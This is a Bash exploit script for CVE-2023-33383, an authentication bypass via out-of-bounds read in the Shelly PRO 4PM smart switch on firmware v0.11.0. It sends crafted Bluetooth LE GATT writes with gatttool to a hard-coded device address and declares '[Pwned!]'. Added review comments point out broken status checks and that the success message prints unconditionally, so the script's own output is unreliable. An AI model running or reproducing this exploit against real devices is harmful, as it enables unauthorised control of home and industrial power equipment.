FlyFar

Shelly PRO 4PM v0.11.0 - Authentication Bypass - CVE-2023-33383

Jan 22nd, 2024
Bash 2.15 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2.  
  3. # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
  4. # Google Dork: NA
  5. # Date: 2nd August 2023
  6. # Exploit Author: The Security Team [exploitsecurity.io]
  7. # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
  8. # Vendor Homepage: https://www.shelly.com/
  9. # Software Link: NA
  10. # Version: Firmware v0.11.0 (REQUIRED)
  11. # Tested on: MacOS/Linux
  12. # CVE : CVE-2023-33383
  13.  
  # Script-wide settings: field splitting, a status flag, the ANSI colour escapes that the
  # later `echo -e` calls interpret, and one unused string.
  14. IFS=  # empty IFS: unquoted expansions are no longer word-split for the rest of the script
  15. failed=$false  # NOTE(review): $false is never assigned in this listing, so failed ends up empty
  16. RED="\e[31m"
  17. GREEN="\e[92m"
  18. WHITE="\e[97m"
  19. ENDCOLOR="\e[0m"  # resets terminal colour
  20. substring="Connection refused"  # NOTE(review): not referenced anywhere else in this listing
  21.  
  22.  
  # banner: clears the terminal, then prints a boxed header (author, short description,
  # CVE id) followed by the "[Enter key to send payload]" prompt.
  # Globals:   GREEN, RED, ENDCOLOR (read)
  # Arguments: none
  # Outputs:   writes to stdout; `echo -e` expands the \e colour escapes
  23. banner()
  24.     {
  25.         clear
  26.         echo -e "${GREEN}[+]*********************************************************[+]"
  27.         echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
  28.         echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
  29.         echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
  30.         echo -e "${GREEN}[+]*********************************************************[+]"
  31.         echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
  32.     }
  33.  
  # Main flow: draw the banner, read one keypress, then drive BlueZ's gatttool (a Bluetooth LE
  # GATT client) against a single hard-coded device address. "x" quits, Enter (an empty read)
  # continues, and any other key matches neither branch, so the script ends without sending anything.
  # NOTE(review): every exit path below uses `exit 0`, so the exit status never signals failure.
  # NOTE(review): none of the status checks below inspect gatttool's result, and the closing
  # "[Pwned!]" line is printed unconditionally after the third write. The script's output is
  # therefore not evidence that a device is or is not affected; the header lists firmware
  # v0.11.0 as required, so checking the installed firmware version is the more reliable test.
  34. banner
  35. read -s -n 1 key  # -s: no echo, -n 1: return after a single character
  36. if [ "$key" = "x" ]; then
  37.     exit 0;
  38. elif [ "$key" = "" ]; then
  39.     gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)  # primary-service discovery, capped at 5 s; only stdout is captured
  40.     if [ -z "$gattout" ]; then  # any run that prints nothing to stdout is reported as a timeout
  41.         echo -e "${RED}Connection timed out${ENDCOLOR}"
  42.         exit 0;
  43.     else
  44.     sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1  # write request; all output and errors discarded
  45.     echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
  46.     sleep 1
  47.     if [ $? -eq 1 ]; then  # NOTE(review): $? is the status of `sleep 1` above, not of gatttool
  48.        $failed=$true  # NOTE(review): not an assignment; failed and $true are both empty, so this expands to the word `=` and is run as a command
  49.        exit 0;
  50.     fi
  51.     sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
  52.     sleep 1
  53.     if [ $? -eq 1 ]; then  # NOTE(review): again tests `sleep 1`, so the failure branch is not reached on a gatttool error
  54.         $failed=$true
  55.         echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
  56.         exit 0;
  57.     else
  58.        sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1  # result of this write is never checked
  59.        sleep 1
  60.        for i in {1..5}  # cosmetic: prints five dots, one per second
  61.        do
  62.           echo -ne "${GREEN}."
  63.           sleep 1
  64.        done
  65.        echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
  66.     fi
  67. fi  # closes the `-z "$gattout"` if/else opened on line 40
  68. fi  # closes the keypress if/elif opened on line 36
  69.            